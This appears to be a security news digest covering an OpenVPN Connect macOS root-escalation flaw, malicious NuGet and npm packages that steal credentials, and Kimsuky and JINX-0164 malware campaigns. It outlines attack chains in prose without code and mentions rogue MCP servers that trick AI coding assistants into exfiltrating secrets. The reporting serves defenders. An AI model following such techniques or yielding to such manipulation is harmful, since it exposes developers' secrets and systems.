Trending Topics

Critical OpenVPN Connect macOS Flaw Lets Local Attackers Gain Root Access

A critical vulnerability in OpenVPN Connect for macOS, tracked as CVE-2026-9560, allowed local users to gain full root privileges by abusing the app’s privileged helper component. The issue affected versions 3.5.1 through 3.8.1, where the background helper that manages VPN connections handled local inter-process communication insecurely - enabling a local attacker to send crafted messages that the service would execute with elevated rights.

With a CVSS score of 9.4, successful exploitation could give an attacker complete control over a Mac with OpenVPN Connect installed, including the ability to install additional malware, disable security tools, or tamper with VPN configurations. The flaw was discovered and responsibly reported by researchers Ismael Esquilichi, Pablo Redondo, and Lê Đức Ninh, and has been fixed in OpenVPN Connect version 3.8.2 for macOS.

The 3.8.2 release also corrects two additional bugs: certain trailing characters in server URLs could break web-based authentication, and profile switching sometimes triggered blank profile imports or crashes during migration.

Users and enterprises should upgrade to 3.8.2 promptly, particularly in shared or managed environments where local accounts could be leveraged to escalate privileges and undermine the integrity of otherwise-secure VPN-protected endpoints.

Malicious Sicoob NuGet Package Steals Banking Credentials And Targets Cloud Secrets

A malicious NuGet package posing as a legitimate C# SDK for Brazilian banking cooperative Sicoob has been caught stealing sensitive authentication material from developers, turning routine API integration into a potential banking heist. Labeled Sicoob.Sdk and downloaded nearly 500 times, versions 2.0.0 through 2.0.4 quietly exfiltrated client IDs, PFX certificates, and PFX passwords to a hard-coded Sentry endpoint whenever developers instantiated the SicoobClient class with production credentials.

Because these PFX certificates underpin automated operations like Pix instant payments and dynamic QR code generation, any compromised material could allow attackers to impersonate a business in Sicoob's banking network and abuse payment flows at scale. Researchers also found that the package captured raw Boleto API responses, potentially exposing transaction details, amounts, due dates, and payer or payee data that could feed downstream fraud or data leakage.

To appear trustworthy, the threat actor maintained a clean GitHub repository that excluded the malicious code entirely, slipping the data-stealing logic only into the NuGet artifact. That source-to-package mismatch is a deliberate exploitation of the trust developers place in open-source ecosystems - and it is easy to miss.

NuGet has since blocked Sicoob.Sdk and the "sicoob" publisher profile, which listed 11 additional packages with around 6,000 combined downloads. Organizations that installed any version of the package should remove it immediately, treat all associated PFX material as compromised, replace certificates, rotate passwords, update client IDs, and review Sicoob API logs for suspicious activity.

This discovery arrives alongside a separate cluster of 14 malicious npm packages typosquatting popular OpenSearch, Elasticsearch, DevOps, and configuration libraries to harvest AWS credentials, HashiCorp Vault tokens, npm tokens, and CI/CD secrets via preinstall hooks. Taken together with recent waves of npm payloads abusing postinstall scripts, dependency confusion, and ad monetization, these campaigns illustrate a broader shift in attacker strategy - from opportunistic typosquatting toward what Sonatype calls "manufactured legitimacy": package names, scopes, and versions crafted to look entirely routine inside modern development workflows.

For defenders, the implication is that no open-source package should be implicitly trusted based on name recognition or download count. Securing software supply chains now requires continuous monitoring for source-to-package mismatches, credential exfiltration behavior, and suspicious lifecycle scripts - before any of that code reaches a production pipeline.

Kimsuky Deploys HTTPSpy And Supercharges Its Espionage Toolkit

North Korean state-sponsored group Kimsuky, also known as Velvet Chollima or APT43, is hitting South Korean military and corporate targets with a refreshed HTTPSpy campaign that uses fake security software sites and spoofed Webex pages to quietly hijack endpoints. In attacks observed through March and April 2026, the group masqueraded as installers for a South Korean B2B messaging service and a fraudulent Cisco Webex troubleshooting page, tricking victims into running JSE-based droppers that pull multi-stage payloads via PowerShell and ultimately deploy the HTTPSpy remote access trojan.

HTTPSpy provides full-featured control of compromised systems - command execution, file upload and download, screenshot capture, process injection, and self-deletion - giving Kimsuky a resilient foothold in sensitive networks. Researchers note that the group has gone beyond simple malware delivery, wiring in real-time infection checks through mechanisms like JSONPing and using stolen meeting schedules to redirect victims into legitimate Webex rooms so the lure looks authentic.

The same cluster of activity shows Kimsuky expanding its arsenal by delivering multiple malware families via JSE, PIF, SCR, and EXE droppers, split broadly between the PebbleDash and AppleSeed lines. New PebbleDash-linked tools include HelloDoor, a Rust-based backdoor likely assisted by large language models, plus HttpMalice and HttpTroy - both capable of reconnaissance, command execution, in-memory payload loading, screenshot capture, reverse shells, and extensive cleanup to remove traces.

On the AppleSeed side, Kimsuky is doubling down on data theft. AppleSeed Spy variants harvest documents, screenshots, keystrokes, USB drive listings, and certificates from the C:\GPKI directory, mirroring capabilities previously seen in Troll Stealer. HappyDoor, a long-running AppleSeed offshoot first seen in 2021, remains active and reflects the group's practice of maintaining source code access and iterating on it over time.

Kaspersky further highlights Kimsuky's growing use of legitimate infrastructure - Visual Studio Code Remote Tunneling, Cloudflare Quick Tunnels, and the DWAgent remote monitoring tool - to establish covert remote access that blends into normal IT operations rather than relying on classic command-and-control channels.

Taken together, these campaigns point to a threat actor with broad access to its original codebase, a willingness to experiment with Rust and Go tooling, and overlapping targets spanning defense, military, government, medical, machinery, and energy sectors in South Korea and beyond. PebbleDash operations have already reached defense organizations in Brazil and Germany, while AppleSeed continues to focus primarily on government entities.

For defenders, Kimsuky's blend of social engineering, staged loaders, living-off-the-land tunnels, and evolving backdoors is a concrete reminder to scrutinize even "legitimate" remote access channels, harden against script-based droppers, and closely monitor certificate stores and GPKI paths for signs of targeted exfiltration.

JINX‑0164 Uses LinkedIn Lures To Drop Custom macOS Infostealer On Crypto Firms

A newly identified threat actor, tracked as JINX-0164, is targeting cryptocurrency organizations through fake recruiter outreach on LinkedIn, virtual meeting invites, and bespoke macOS malware designed to steal digital assets. Active since at least mid-2025 and motivated by financial gain, the group targets developers and engineers - using recruitment-themed social engineering to move from a single compromised laptop into CI/CD pipelines and code distribution systems, where they can tamper with source code and siphon crypto wallet credentials.

In the attack chain detailed by researchers, victims first receive messages from credible-looking LinkedIn profiles offering interviews, then are directed to a rogue domain impersonating a teleconferencing provider that prompts them to download a "meeting client". That installer pulls down a bash script from a fake Apple driver store domain, which downloads an architecture-aware payload masquerading as a system audio driver named coreaudiod, saved as ChromeUpdater and launched via launchctl.

The payload is a Python-based macOS infostealer and remote access trojan dubbed AUDIOFIX. Once active, it harvests password manager entries, browser and iCloud Keychain credentials, SSH keys, console histories, cryptocurrency wallet extensions and addresses, and live Discord, Slack, and Telegram sessions. It also supports manual reconnaissance, file exfiltration, shell command execution, and additional payload retrieval.

JINX-0164 does not stop at LinkedIn lures. The group also weaponized the JavaScript ecosystem by pushing a compromised version of the @velora-dex/sdk npm package - a legitimate DeFi library - that silently installed a Go-based backdoor known as MiniRAT on macOS systems. MiniRAT allows attackers to upload files, run arbitrary commands, and pull additional tooling from attacker-controlled servers, turning a normal development dependency into a bridgehead into crypto trading infrastructure.

While aspects of the campaign - including its focus on cryptocurrency, VPN usage, and spoofed domains - resemble patterns associated with North Korean clusters such as BlueNoroff, current evidence shows no direct infrastructure overlaps. JINX-0164 is currently treated as a distinct, financially driven actor that combines social media phishing, macOS-specific malware, and software supply chain abuse to reach high-value crypto targets.

For security teams at cryptocurrency and DeFi organizations, this campaign is a reminder that the attack surface now includes LinkedIn inboxes, developer dependencies, and macOS endpoints - not just traditional network perimeters.

Typosquatted npm Packages Used To Steal Cloud and CI/CD Secrets

Security researchers have uncovered a live supply chain campaign in which a single threat actor published dozens of typosquatted npm packages designed to quietly steal cloud and CI/CD credentials from developer environments and build pipelines. The malicious packages closely mimic popular OpenSearch and Elasticsearch configuration and DevOps libraries, then use preinstall scripts and custom infostealer code to harvest AWS, Azure, and GCP credentials, HashiCorp Vault tokens, npm tokens, and other environment secrets before exfiltrating them to attacker-controlled infrastructure.

Once in possession of those secrets, the attacker can pivot into CI workflows, cloud accounts, and private repositories - tampering with code, implanting backdoors, or abusing cloud resources at will.

This campaign fits a broader pattern of npm supply chain abuse that includes worm-like behavior: stolen tokens are used to inject malicious dependencies into additional repositories and GitHub Actions workflows, turning compromised developers and projects into new propagation points. Some variants go further, tampering with local configurations for AI coding assistants by inserting a rogue Model Context Protocol server designed to trick those tools into exfiltrating sensitive local files and secrets.

Typosquatting has evolved well beyond simple lookalike naming. These are now multi-stage operations that blend credential theft, CI takeover, and AI toolchain manipulation into a single campaign. For organizations, that means enforcing strict dependency policies, monitoring for suspicious lifecycle scripts, and treating any newly published or unfamiliar npm package as a potential risk until it can be verified otherwise.